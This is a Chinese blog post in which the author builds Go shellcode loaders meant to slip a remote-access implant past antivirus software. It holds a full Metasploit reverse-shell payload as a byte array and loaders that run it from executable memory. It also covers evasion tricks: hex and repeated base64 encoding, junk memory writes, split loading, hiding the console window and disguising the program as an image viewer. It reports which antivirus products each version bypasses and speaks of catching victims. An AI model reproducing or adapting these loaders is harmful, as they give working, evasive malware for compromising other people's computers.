Go测试远控免杀学习

学了快一个月的 Go菜鸡也拿来瞎整一下，哈哈哈哈

虚拟机上下了一堆杀毒软件，免杀看了不少也来实验一下

实验环境：
go version go1.18
msf 6.0.45-dev
win10

下面开整

先msf 生成一段 shellcode，具体什么意思百度了解一下
复制出来转换一下格式，\x 换成 0x，逗号隔开

package mainimport ("os""syscall""unsafe"
)const (MEM_COMMIT             = 0x1000MEM_RESERVE            = 0x2000PAGE_EXECUTE_READWRITE = 0x40
)var (kernel32      = syscall.MustLoadDLL("kernel32.dll")   //调用kernel32.dllntdll         = syscall.MustLoadDLL("ntdll.dll")      //调用ntdll.dllVirtualAlloc  = kernel32.MustFindProc("VirtualAlloc") //使用kernel32.dll调用ViretualAlloc函数RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory")   //使用ntdll调用RtCopyMemory函数shellcode_buf = []byte{0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xcc, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52,0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x51, 0x56, 0x48, 0x8b, 0x52, 0x18, 0x48,0x8b, 0x52, 0x20, 0x48, 0x0f, 0xb7, 0x4a, 0x4a, 0x48, 0x8b, 0x72, 0x50, 0x4d, 0x31, 0xc9,0x48, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 0x41,0x01, 0xc1, 0xe2, 0xed, 0x52, 0x48, 0x8b, 0x52, 0x20, 0x8b, 0x42, 0x3c, 0x48, 0x01, 0xd0,0x41, 0x51, 0x66, 0x81, 0x78, 0x18, 0x0b, 0x02, 0x0f, 0x85, 0x72, 0x00, 0x00, 0x00, 0x8b,0x80, 0x88, 0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x67, 0x48, 0x01, 0xd0, 0x8b, 0x48,0x18, 0x50, 0x44, 0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0, 0xe3, 0x56, 0x48, 0xff, 0xc9, 0x4d,0x31, 0xc9, 0x41, 0x8b, 0x34, 0x88, 0x48, 0x01, 0xd6, 0x48, 0x31, 0xc0, 0xac, 0x41, 0xc1,0xc9, 0x0d, 0x41, 0x01, 0xc1, 0x38, 0xe0, 0x75, 0xf1, 0x4c, 0x03, 0x4c, 0x24, 0x08, 0x45,0x39, 0xd1, 0x75, 0xd8, 0x58, 0x44, 0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0, 0x66, 0x41, 0x8b,0x0c, 0x48, 0x44, 0x8b, 0x40, 0x1c, 0x49, 0x01, 0xd0, 0x41, 0x8b, 0x04, 0x88, 0x41, 0x58,0x48, 0x01, 0xd0, 0x41, 0x58, 0x5e, 0x59, 0x5a, 0x41, 0x58, 0x41, 0x59, 0x41, 0x5a, 0x48,0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41, 0x59, 0x5a, 0x48, 0x8b, 0x12, 0xe9,0x4b, 0xff, 0xff, 0xff, 0x5d, 0x49, 0xbe, 0x77, 0x73, 0x32, 0x5f, 0x33, 0x32, 0x00, 0x00,0x41, 0x56, 0x49, 0x89, 0xe6, 0x48, 0x81, 0xec, 0xa0, 0x01, 0x00, 0x00, 0x49, 0x89, 0xe5,0x49, 0xbc, 0x02, 0x00, 0x0d, 0x05, 0xc0, 0xa8, 0x6e, 0x7f, 0x41, 0x54, 0x49, 0x89, 0xe4,0x4c, 0x89, 0xf1, 0x41, 0xba, 0x4c, 0x77, 0x26, 0x07, 0xff, 0xd5, 0x4c, 0x89, 0xea, 0x68,0x01, 0x01, 0x00, 0x00, 0x59, 0x41, 0xba, 0x29, 0x80, 0x6b, 0x00, 0xff, 0xd5, 0x6a, 0x0a,0x41, 0x5e, 0x50, 0x50, 0x4d, 0x31, 0xc9, 0x4d, 0x31, 0xc0, 0x48, 0xff, 0xc0, 0x48, 0x89,0xc2, 0x48, 0xff, 0xc0, 0x48, 0x89, 0xc1, 0x41, 0xba, 0xea, 0x0f, 0xdf, 0xe0, 0xff, 0xd5,0x48, 0x89, 0xc7, 0x6a, 0x10, 0x41, 0x58, 0x4c, 0x89, 0xe2, 0x48, 0x89, 0xf9, 0x41, 0xba,0x99, 0xa5, 0x74, 0x61, 0xff, 0xd5, 0x85, 0xc0, 0x74, 0x0a, 0x49, 0xff, 0xce, 0x75, 0xe5,0xe8, 0x93, 0x00, 0x00, 0x00, 0x48, 0x83, 0xec, 0x10, 0x48, 0x89, 0xe2, 0x4d, 0x31, 0xc9,0x6a, 0x04, 0x41, 0x58, 0x48, 0x89, 0xf9, 0x41, 0xba, 0x02, 0xd9, 0xc8, 0x5f, 0xff, 0xd5,0x83, 0xf8, 0x00, 0x7e, 0x55, 0x48, 0x83, 0xc4, 0x20, 0x5e, 0x89, 0xf6, 0x6a, 0x40, 0x41,0x59, 0x68, 0x00, 0x10, 0x00, 0x00, 0x41, 0x58, 0x48, 0x89, 0xf2, 0x48, 0x31, 0xc9, 0x41,0xba, 0x58, 0xa4, 0x53, 0xe5, 0xff, 0xd5, 0x48, 0x89, 0xc3, 0x49, 0x89, 0xc7, 0x4d, 0x31,0xc9, 0x49, 0x89, 0xf0, 0x48, 0x89, 0xda, 0x48, 0x89, 0xf9, 0x41, 0xba, 0x02, 0xd9, 0xc8,0x5f, 0xff, 0xd5, 0x83, 0xf8, 0x00, 0x7d, 0x28, 0x58, 0x41, 0x57, 0x59, 0x68, 0x00, 0x40,0x00, 0x00, 0x41, 0x58, 0x6a, 0x00, 0x5a, 0x41, 0xba, 0x0b, 0x2f, 0x0f, 0x30, 0xff, 0xd5,0x57, 0x59, 0x41, 0xba, 0x75, 0x6e, 0x4d, 0x61, 0xff, 0xd5, 0x49, 0xff, 0xce, 0xe9, 0x3c,0xff, 0xff, 0xff, 0x48, 0x01, 0xc3, 0x48, 0x29, 0xc6, 0x48, 0x85, 0xf6, 0x75, 0xb4, 0x41,0xff, 0xe7, 0x58, 0x6a, 0x00, 0x59, 0x49, 0xc7, 0xc2, 0xf0, 0xb5, 0xa2, 0x56, 0xff, 0xd5,}
)func checkErr(err error) {if err != nil { //如果内存调用出现错误，可以报出if err.Error() != "The operation completed successfully." { //如果调用dll系统发出警告，但是程序运行成功，则不进行警报println(err.Error())os.Exit(1)}}
}func main() {shellcode := shellcode_buf//调用VirtualAlloc为shellcode申请一块内存addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)if addr == 0 {checkErr(err)}//调用RtlCopyMemory来将shellcode加载进内存当中_, _, err = RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)))checkErr(err)//syscall来运行shellcodesyscall.Syscall(addr, 0, 0, 0, 0)
}

kernel32.dll 是一个很常见的DLL，它包含核心系统功能，如访问和操作内存、文件和硬件，几乎很多木马都会去调用这个函数ntdll.dll    是Windows内核的接口。可执行文件通常不直接导入这个函数，而是由Kernel32.dll间接导入，如果一个可执行文件导入了这个文件，这意味着作者企图使用Ntdll.dll 那些不是正常提供给Windows程序使用的函数。一些如隐藏功能和操作进程等任务会使用这个接口

编译 go程序，go build demo.go

还可以做点手脚，比如去掉运行时的黑框 go build -ldflags="-H windowsgui -w -s" demo.go
甚至骚一点，可以让程序调用打开图片，让人以为这是一个打开图片的程序，放松警惕

好了，现在传到虚拟机上测试效果

1、`windows defender`

静态查杀没问题，现在试试运行，可以直接过，啊这

2、`金山毒霸`

静态也是没问题，现在运行，同样很轻松

3、`360安全卫士`

虽然被查出来了，但是上传上去并没有立刻报毒，所以如果受害者没有经常扫毒的习惯还是有机会的
比如我电脑就是养毒一堆马懒得管

4、`火绒安全`

刚传上去就报毒，然后给我自动删了，没得玩了

修改一下，把shellcode 单独拿出来再试一下

这里把0x 逗号还有换行空格全部去掉，在加载时再恢复

package mainimport ("encoding/hex""fmt""io/ioutil""os""syscall""unsafe"
)const (MEM_COMMIT             = 0x1000MEM_RESERVE            = 0x2000PAGE_EXECUTE_READWRITE = 0x40
)var (kernel32      = syscall.MustLoadDLL("kernel32.dll")ntdll         = syscall.MustLoadDLL("ntdll.dll")VirtualAlloc  = kernel32.MustFindProc("VirtualAlloc")RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory")
)func Readcode() string {f, err := ioutil.ReadFile("1.txt") //为我们需要加载的shellcode文件，这里可以使用其他格式的文件来进行混淆if err != nil {fmt.Println("read fail", err)}return string(f)
}func checkErr(err error) {if err != nil {if err.Error() != "The operation completed successfully." {println(err.Error())os.Exit(1)}}
}func main() {b := Readcode() // 加载shellcodeshellcode, err := hex.DecodeString(b) if err != nil {checkErr(err)}addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)if addr == 0 {checkErr(err)}_, _, err = RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), (uintptr)(len(shellcode)))checkErr(err)syscall.Syscall(addr, 0, 0, 0, 0)}

好吧，还是给火绒查出来了，试试360能不能查出来

还好，这次360没查出来，直接过了

5、`微步沙箱`

6、`VirusTotal`

现在就是火绒免杀还没效果

在前面基础上改进，考虑可以把 shellcode多编码几次

在shellcode 载入内存前可以先载入一段没用的字符串到内存达到混淆的效果

shellcode 也可以分段载入到内存中

package mainimport ("encoding/base64""encoding/hex""fmt""io/ioutil""os""syscall""unsafe"
)const (MEM_COMMIT             = 0x1000MEM_RESERVE            = 0x2000PAGE_EXECUTE_READWRITE = 0x40
)var (kernel32      = syscall.MustLoadDLL("kernel32.dll")ntdll         = syscall.MustLoadDLL("ntdll.dll")VirtualAlloc  = kernel32.MustFindProc("VirtualAlloc")RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory")
)func checkErr(err error) {if err != nil {if err.Error() != "The operation completed successfully." {println(err.Error())os.Exit(1)}}
}func Readcode() string {f, err := ioutil.ReadFile("1.txt")if err != nil {fmt.Println("read fail", err)}return string(f)
}func Base64DecodeString(str string) string {resBytes, _ := base64.StdEncoding.DecodeString(str)return string(resBytes)
}func main() {//内存加载shellcode前，先压入一段无关字符串用来混淆var c string = "qweqwdsfqweqwqwswqqweqdqwdqwdwqeqrwqeqwQWRQW/.OPKDIJGIJWDOIAOSJIRGJOEKDOQIWOIJOGWEMPOSDPOOPGKWE[LWEPQKPOKEORKOPKPROKPOKOPQWKEPQOGOIMEKOMDMQWPODPOKOK3-021-04-34-3204O-02I059032JR0JI@JI3J3E02e"//调用VirtualAllo申请一块内存addr1, _, err := VirtualAlloc.Call(0, uintptr(len(c)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)//调用RtlCopyMemory加载进内存当中_, _, err = RtlCopyMemory.Call(addr1, (uintptr)(unsafe.Pointer(&c)), uintptr(len(c)/2))b := Readcode()                     // 加载 shellcodedeStrBytes := Base64DecodeString(b) // 6 次base64解码for i := 0; i < 5; i++ {deStrBytes = Base64DecodeString(deStrBytes)}shellcode, err := hex.DecodeString(deStrBytes)addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)if addr == 0 {checkErr(err)}_, _, err = RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)/2))_, _, err = RtlCopyMemory.Call(addr+uintptr(len(shellcode)/2), (uintptr)(unsafe.Pointer(&shellcode[len(shellcode)/2])), uintptr(len(shellcode)/2))checkErr(err)syscall.Syscall(addr, 0, 0, 0, 0)}

总结

Go的免杀效果确实很不错，这些常见的杀毒软件都是可以很轻松的就绕过了

还有就是，电脑装一堆杀毒软件互相打架真的害怕，电脑风扇不知道干啥呼呼没停过，

卡的一逼，开个文件还要等他转一会儿，我麻了啊

问个问题，女生的电脑是不是也是这样子的呢，至少2个杀毒软件

我啥也没干，90% 真不错